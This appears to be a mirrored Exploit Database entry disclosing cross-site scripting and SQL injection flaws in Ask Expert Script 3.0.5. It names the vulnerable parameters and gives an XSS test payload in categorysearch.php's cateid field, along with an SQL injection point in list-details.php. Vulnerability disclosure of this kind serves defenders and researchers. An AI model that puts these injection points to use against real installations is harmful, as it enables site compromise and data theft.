Ask Expert Script 3.0.5 – Cross Site Scripting / SQL Injection

Exploit Database
18 阅读

作者： Mr Winst0n

日期： 2019-02-19
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/46426/

# Exploit Title: Ask Expert Script 3.0.5 - Cross Site Scripting / SQL Injection
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 19, 2019
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link : https://www.phpscriptsmall.com/product/ask-expert-script/
# Tested Version: 3.0.5
# Tested on: Kali linux, Windows 8.1 


# PoC:

# Cross Site Scripting:

# http://localhost/[PATH]/categorysearch.php?cateid=[XSS]
# http://localhost/[PATH]/categorysearch.php?cateid=<scRiPt>alert(1)</ScrIpT>

# SQL Injection:

# http://localhost/[PATH]/list-details.php?view=[SQL]

last Exploits
Ask Expert Script 3.0.5 – Cross Site Scripting / SQL Injection的更多信息

WordPress Plugin cnhk-Slideshow – Arbitrary File Upload：
Skybox Platform < 7.0.611 - Multiple Vulnerabilities：
New STAR 2.1 – SQL Injection / Cross-Site Scripting：
Patient Appointment Scheduler System 1.0 – Unauthenticated File Upload：
OL-Commerce – ‘/OL-Commerce/create_account.php?country’ SQL Injection：
WordPress Plugin Business Intelligence – SQL Injection (Metasploit)：
MedDream PACS Server Premium 6.7.1.1 – ’email’ SQL Injection：
Time and Expense Management System 3.0 – ‘table’ SQL Injection：